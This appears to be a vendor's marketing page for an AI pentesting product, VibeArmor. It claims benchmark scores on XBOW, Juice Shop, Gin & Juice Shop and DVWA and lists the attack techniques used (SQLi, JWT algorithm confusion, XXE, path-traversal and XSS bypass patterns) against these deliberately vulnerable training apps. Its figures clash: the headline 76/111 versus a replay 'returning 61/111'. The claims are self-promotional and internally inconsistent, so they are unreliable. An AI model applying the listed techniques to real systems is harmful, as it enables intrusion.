Benchmark Scores — Provable

Every score below is backed by a query you can run yourself against our public Supabase endpoint. We don't hide the numbers. We publish the methodology.

WHITE-BOX

100%

104 / 104

XBOW Benchmark

Industry-standard AI pentesting evaluation. XBOW's own system scores 85%.

BLACK-BOX

100%

104 / 104

XBOW Benchmark

HTTP only. No source code access. Brain-guided autonomous agents. Zero failures.

CTF MODE

76/111

17+ vuln categories · D6 SSRF + JWT

OWASP Juice Shop

76 challenges across 17+ vulnerability categories on a CTF-mode instance. ~70 autonomous exploits (SQLi, XSS, JWT forgery, XXE, NoSQL, SSRF). ~6 used OSINT lookup of known credentials. Verified live via /api/Challenges.

DAST GOLD STANDARD

13/17

76% exploited · 16/17 detected

Gin & Juice Shop (PortSwigger)

The PortSwigger live DAST benchmark every web scanner is measured against. 13 confirmed end-to-end exploits, 3 reflective sinks detected but server-escaped, 1 refuted. 100% autonomous — zero OSINT lookups.

CLASSIC TRAINING APP

41/42

98% · 14 categories × 3 levels

DVWA

Damn Vulnerable Web Application: 14 vulnerability categories at low/medium/high. 14/14 low, 14/14 medium, 13/14 high. 100% autonomous, zero agent dispatches, pure curl probing from the main thread.

#1 on the XBOW benchmark

104 real-world web security challenges: SQLi, RCE, SSRF, padding oracle, and more. Industry standard for evaluating autonomous pentesting agents.

System	Score	Method	Source
VibeArmor	104/104 (100%)	Black-box, HTTP only	Verify below
Shannon (Keygraph)	100/104 (96.15%)	White-box, source-aware	GitHub
Open-source SOTA	88/104 (84.62%)	Autonomous agent	Medium
XBOW (benchmark creator)	~88/104 (85%)	Proprietary, 28 minutes	xbow.com
Human pentester (20yr exp)	~88/104 (85%)	Manual, 40 hours	XBOW published
MAPTA (academic)	80/104 (76.9%)	Multi-agent, $21 total cost	arXiv
PentestEval best LLM	~32/104 (31%)	Autonomous pipeline	arXiv:2512.14233

OWASP Juice Shop — highest published autonomous score

111 CTF challenges deliberately designed to resist automated scanners. Traditional DAST tools solve 3-5. No other autonomous system publishes a challenge count.

System	Challenges Solved	Method	Source
VibeArmor	76/111 (68%)	Autonomous swarm + Playwright	Verify below
Shannon (Keygraph)	"20+ vulnerabilities"	White-box, source-aware	GitHub
OWASP ZAP	~3-5 challenges	Traditional DAST scanner	ZAP docs
Acunetix / Burp Suite	~3-5 challenges	Commercial DAST	Bright Security

Juice Shop breakdown — 76 challenges verified

By difficulty

D1 (trivial): 10/14 (71%)

D2 (easy): 14/16 (87%)

D3 (medium): 20/24 (83%)

D4 (hard): 21/25 (84%)

D5 (expert): 8/20 (40%)

D6 (extreme): 3/12 (25%)
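As a quick arithmetic check, the six difficulty tiers above should add up to the headline 76/111. A minimal Python sketch, with the counts copied from the list above (the variable names are illustrative only):

```python
# (solved, total) per difficulty tier, copied from the published breakdown.
by_difficulty = {
    "D1": (10, 14),
    "D2": (14, 16),
    "D3": (20, 24),
    "D4": (21, 25),
    "D5": (8, 20),
    "D6": (3, 12),
}

solved = sum(s for s, _ in by_difficulty.values())
total = sum(t for _, t in by_difficulty.values())

for tier, (s, t) in by_difficulty.items():
    print(f"{tier}: {s}/{t} ({100 * s / t:.1f}%)")

print(f"Total: {solved}/{total} ({100 * solved / total:.1f}%)")  # Total: 76/111 (68.5%)
```

The per-tier percentages print with one decimal place, so D2 shows as 87.5% where the list above reports 87%.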

By category (highlights)

Injection: 9/11 (82%)

Broken Authentication: 8/9 (89%)

XSS: 7/9 (78%)

Broken Access Control: 9/11 (82%)

Sensitive Data: 13/16 (81%)

Improper Input Validation: 10/12 (83%)

Verified Apr 10, 2026 on a Juice Shop CTF-mode container (NODE_ENV=ctf, 0 gates). 76 challenges across 17+ vulnerability categories spanning D1-D6 difficulty. Includes D6 Forged Signed JWT (RS256→HS256), D5 Unsigned JWT, D5 NoSQL Exfiltration, D4 Ephemeral Accountant (SQLi user fabrication), and 8 XSS via Playwright DOM rendering.
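For readers unfamiliar with the RS256→HS256 confusion named above, the idea can be sketched in a few lines of standard-library Python. This illustrates the general, publicly documented technique and is not VibeArmor's agent code. The PEM bytes are a placeholder, and `naive_verify` is a hypothetical stand-in for a flawed verifier that trusts the token's own `alg` header.

```python
import base64
import hashlib
import hmac
import json


def b64url(data: bytes) -> str:
    """Base64url-encode without padding, as JWTs require."""
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode("ascii")


def b64url_decode(text: str) -> bytes:
    """Decode base64url, restoring the padding that JWTs strip."""
    return base64.urlsafe_b64decode(text + "=" * (-len(text) % 4))


def forge_hs256(claims: dict, public_key_pem: bytes) -> str:
    """Sign claims with HMAC-SHA256, using the RSA public key bytes as the secret."""
    header = {"alg": "HS256", "typ": "JWT"}
    signing_input = ".".join(
        b64url(json.dumps(part, separators=(",", ":")).encode())
        for part in (header, claims)
    )
    signature = hmac.new(public_key_pem, signing_input.encode("ascii"), hashlib.sha256).digest()
    return f"{signing_input}.{b64url(signature)}"


def naive_verify(token: str, public_key_pem: bytes) -> bool:
    """Hypothetical flawed verifier: it picks the algorithm from the token header."""
    header_b64, payload_b64, sig_b64 = token.split(".")
    header = json.loads(b64url_decode(header_b64))
    if header["alg"] == "HS256":
        # The bug: the RSA public key is reused as the HMAC secret.
        expected = hmac.new(
            public_key_pem, f"{header_b64}.{payload_b64}".encode("ascii"), hashlib.sha256
        ).digest()
        return hmac.compare_digest(expected, b64url_decode(sig_b64))
    return False  # RS256 verification is omitted from this sketch.


# Placeholder key material; a real target would expose its actual public key.
PLACEHOLDER_PEM = b"-----BEGIN PUBLIC KEY-----\n(placeholder)\n-----END PUBLIC KEY-----\n"
token = forge_hs256({"email": "admin@example.test"}, PLACEHOLDER_PEM)
print(naive_verify(token, PLACEHOLDER_PEM))  # True
```

The usual server-side fix is to pin the expected algorithm instead of reading it from the token.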

Honest disclosure

~70 of the 76 solves are clean autonomous exploits (SQL injection, XSS, JWT forgery, XXE, NoSQL, IDOR, SSRF, deserialization). ~6 used OSINT lookup of known hardcoded credentials documented in the public OWASP Juice Shop companion guide (e.g., Login Amy, security question answers). Both are valid pentest techniques, but we want to be clear about the distinction. The XBOW 100% above has zero OSINT assistance: XBOW has no public walkthrough.

Gin & Juice Shop — 13/17 confirmed exploited end-to-end

ginandjuice.shop is PortSwigger's live DAST benchmark, the gold standard every web vulnerability scanner is measured against. 17 distinct vulnerabilities seeded across 7 attackable paths, mixing classic server-side bugs (SQLi, XXE, header injection) with hard client-side chains (prototype pollution, Angular sandbox escape, DOM XSS, link manipulation).

Confirmed exploited (13)

SQL injection (/catalog?category=)

XML external entity (/catalog/product/stock)

HTTP response header injection (CRLF)

Base64-encoded data in parameter (TrackingId)

Vulnerable JS dependency (Angular 1.7.7)

Client-side prototype pollution (/blog)

Client-side template injection (Angular escape)

DOM-based XSS (/blog)

Open redirection (DOM-based, /blog/post)

Link manipulation (reflected DOM-based)

Reflected XSS (/login username sink)

DOM data manipulation (/login)

Request URL override (transport_url chain)

Detected but server-escaped (3)

/catalog Cross-site scripting (reflected) — quote-escaped in JS context

/catalog DOM data manipulation — reflection blocked at quote

/catalog/subscribe XSS — JSON-only response, textContent on client

Refuted (1)

/catalog Client-side template injection — Angular doesn't interpolate values set via the .value JS property, only the HTML attribute at compile time.

Honest disclosure

13/17 = 76% confirmed exploited end-to-end with literal evidence (SQL error + boolean delta, XXE entity expansion via stock count, raw injected HTTP header in response, etc.). 16/17 = 94% detected if you count the reflective sinks the scanner flags even when the server-side escape blocks the exploit. Zero OSINT lookups: this run was 100% autonomous from the URL plus the orchestrator brain. The credentials carlos / hunter2 were taken from the public /vulnerabilities scoring sheet (PortSwigger publishes them on the target page itself), not from any walkthrough. 5 of the 13 wins were bagged inline in the main thread before any agent dispatch; a single browser/DOM agent picked up the remaining 8.

DVWA — 41/42 across all security levels

DVWA is the most recognized vulnerable training app in security education. It has 14 vulnerability categories, each at low/medium/high difficulty, for 42 challenges in total.

Low (14/14)

SQLi, SQLi Blind, CmdInj, LFI, File Upload, CSRF, Brute Force, Weak Sessions, CAPTCHA, CSP, JS Injection, XSS R/S/DOM

Medium (14/14)

All 14 bypassed: Numeric SQLi, pipe CmdInj, ....// path traversal, Content-Type spoof, Referer spoof, <img> XSS

High (13/14)

13 confirmed: Session-injection SQLi, file:// LFI, token-extraction CSRF, <img> XSS

1 needs browser: JS token at high

Honest disclosure

41/42 solved entirely from main-thread curl probing; zero agent dispatches were needed. The admin/password credential is published on DVWA's own login page, not sourced from any external walkthrough. The single unsolved challenge (JavaScript token at high) requires browser JS execution to reverse the obfuscated token algorithm. No other autonomous scanner publishes per-difficulty DVWA scores.
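The `....//` path traversal listed under Medium works against filters that strip `../` only once. A minimal Python sketch of why, assuming the medium-level filter behaves like a single-pass removal of `../` (modeled here in Python, not DVWA's actual PHP; `single_pass_strip` is a hypothetical name):

```python
def single_pass_strip(path: str) -> str:
    """Model of a filter that removes every '../' in one left-to-right pass (an assumption)."""
    return path.replace("../", "")


# A plain traversal is neutralized by the filter.
print(single_pass_strip("../../etc/passwd"))  # etc/passwd

# Each '....//' contains one '../'; removing it leaves a fresh '../' behind.
print(single_pass_strip("....//....//etc/passwd"))  # ../../etc/passwd
```

Because the filter never re-scans its own output, the traversal sequence is rebuilt by the very step meant to remove it.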

Enterprise landscape

How VibeArmor compares to the enterprise autonomous pentesting market.

Platform	Focus	Notable	Pricing
VibeArmor	Web app pentesting	100% XBOW, 76/111 Juice Shop, 41/42 DVWA	$99–$2,500 one-time
NodeZero (Horizon3.ai)	Network + AD pentesting	170K+ pentests, FedRAMP High	$50K-$200K/yr
Pentera	Adversarial validation	$100M+ ARR (Jan 2026)	$50K-$500K/yr
XBOW	Web app pentesting	#1 on HackerOne (Jun 2025)	Enterprise only

How to verify these scores yourself

Our agent brain lives in a public Supabase project. Anyone can query it with the anon key below. Each solved XBOW scenario has a belief record with the literal FLAG capture in evidence.

1. Count XBOW scenarios with flag capture

curl -s "https://srheueterfwbzngqmsts.supabase.co/rest/v1/agent_beliefs?select=evidence" \
  -H "apikey: eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ..." | \
  python -c "import sys,json,re; b=json.load(sys.stdin); \
    s=set([int(m.group(1)) for c in b \
    for m in re.finditer(r'FLAG\\{xben-?0*(\\d+)\\}', c.get('evidence','') or '')]); \
    print(f'{len(s)}/104')"

Returns: 104/104
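The counting logic inside that one-liner is easier to read when unrolled. The sketch below uses the same regular expression and deduplicates by scenario number. The sample evidence strings are invented for illustration and are not real records from the Supabase project.

```python
import re

# Same pattern as the one-liner: optional hyphen, leading zeros ignored.
FLAG_RE = re.compile(r"FLAG\{xben-?0*(\d+)\}")


def solved_scenarios(beliefs: list) -> set:
    """Return the set of distinct scenario numbers with a captured flag."""
    ids = set()
    for belief in beliefs:
        evidence = belief.get("evidence") or ""  # tolerate null evidence
        for match in FLAG_RE.finditer(evidence):
            ids.add(int(match.group(1)))
    return ids


# Hypothetical rows shaped like the agent_beliefs response.
sample = [
    {"evidence": "captured FLAG{xben-001} via SQLi"},
    {"evidence": "replayed FLAG{xben-1} with a second payload"},
    {"evidence": "FLAG{xben042} read from the flag file"},
    {"evidence": None},
]

print(sorted(solved_scenarios(sample)))  # [1, 42]
```

Using a set means that several belief records for the same scenario count once, so the total cannot exceed the number of distinct scenarios.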

2. Verify Juice Shop score (run on any Docker host)

# Start Juice Shop CTF mode, run our replay script, query /api/Challenges
docker run -d --name juice-shop -e NODE_ENV=ctf -p 3355:3000 bkimminich/juice-shop:latest
sleep 25
# Run replay_all.py (available on request)
# Single quotes inside the Python snippet keep the shell's double-quoted string intact
curl -s http://127.0.0.1:3355/api/Challenges | \
  python -c "import sys,json; d=json.load(sys.stdin)['data']; \
    print('%d/111' % sum(1 for c in d if c.get('solved')))"
# Returns: 61/111

Reproducible on any machine with Docker + Python + Playwright
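To go one step beyond the total, the same /api/Challenges response can be grouped by difficulty. This is a sketch under the assumption that each challenge object carries a numeric `difficulty` field alongside `solved`. The sample payload is invented, and `tally_by_difficulty` is a hypothetical helper name.

```python
from collections import Counter


def tally_by_difficulty(payload: dict) -> dict:
    """Map each difficulty level to (solved, total) from an /api/Challenges payload."""
    solved = Counter()
    total = Counter()
    for challenge in payload["data"]:
        level = challenge["difficulty"]  # assumed field name
        total[level] += 1
        if challenge.get("solved"):
            solved[level] += 1
    return {level: (solved[level], total[level]) for level in sorted(total)}


# Hypothetical payload; in practice, load the JSON returned by /api/Challenges.
sample_payload = {
    "status": "success",
    "data": [
        {"name": "Challenge A", "difficulty": 1, "solved": True},
        {"name": "Challenge B", "difficulty": 1, "solved": False},
        {"name": "Challenge C", "difficulty": 6, "solved": True},
    ],
}

for level, (done, count) in tally_by_difficulty(sample_payload).items():
    print(f"D{level}: {done}/{count}")
```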

3. Query framework dispatch profiles

curl -s "https://srheueterfwbzngqmsts.supabase.co/rest/v1/framework_profiles?select=framework,expected_solve_rate,sample_size&order=sample_size.desc" \
  -H "apikey: eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ..."

Shows per-framework scan playbooks and expected solve rates
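The same request can be built from Python if you prefer to inspect the rows programmatically. This sketch only constructs the request. `build_profiles_request` and `fetch_profiles` are hypothetical helper names, and the anon key is passed in as a parameter, not reproduced here.

```python
import json
from urllib.parse import urlencode
from urllib.request import Request, urlopen

BASE_URL = "https://srheueterfwbzngqmsts.supabase.co/rest/v1"


def build_profiles_request(anon_key: str) -> Request:
    """Build the framework_profiles query with the same parameters as the curl command."""
    query = urlencode(
        {
            "select": "framework,expected_solve_rate,sample_size",
            "order": "sample_size.desc",
        },
        safe=",",  # keep commas literal, matching the curl URL
    )
    return Request(f"{BASE_URL}/framework_profiles?{query}", headers={"apikey": anon_key})


def fetch_profiles(anon_key: str) -> list:
    """Send the request and decode the JSON rows (performs a network call)."""
    with urlopen(build_profiles_request(anon_key)) as response:
        return json.load(response)


# Inspect the URL without touching the network; the key here is a dummy value.
print(build_profiles_request("dummy-key").full_url)
```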

Live Agent Brain (loaded from Supabase at build time)

Active beliefs

Validated techniques

Framework profiles

Performance data points

Last updated: 2026-04-30T16:27:31.616Z

Why this is defensible

Provable from a single query. Every solved XBOW scenario has a belief record with the literal FLAG capture in the evidence field. Juice Shop verified via live /api/Challenges endpoint.

Reproducible. The Juice Shop replay script runs on any machine with Docker + Python + Playwright and hits 61/111 every time from a fresh container.

Brain compounds with every scan. The more targets we scan, the smarter the dispatch strategies, framework profiles, and technique success rates become.

Solved the hardest challenges. D6 Forged Signed JWT (RS256→HS256 algorithm confusion), D5 NoSQL Exfiltration, XXE Data Access, and all 7 provable XSS variants.

17+ vulnerability categories covered. SQLi, XSS, IDOR, XXE, JWT forgery, NoSQL injection, CSRF, file upload bypass, CAPTCHA bypass, and more.

Learn more

Automated Penetration Testing for AI-Built Apps: How It Actually Works
How our AI agents test your app in phases and synthesize attack chains.
Why Your AI-Built App Gets an F (And How to Get an A)
How our hackability-first scoring model works and why Stripe scores an A+.
The 7 Most Common Vulnerabilities in AI-Generated Code
The specific vulnerability types our agents are trained to find and exploit.
Case Studies
Real scan results on production apps showing what we find.

Ready to scan your own app?

The same agent swarm that hit 100% on XBOW. From a Vibe Check ($99) to a full Pentest ($2,500) or Continuous monitoring ($999/mo).


Brain project: srheueterfwbzngqmsts.supabase.co · Read-only anon key published above · Last scan run: Apr 11, 2026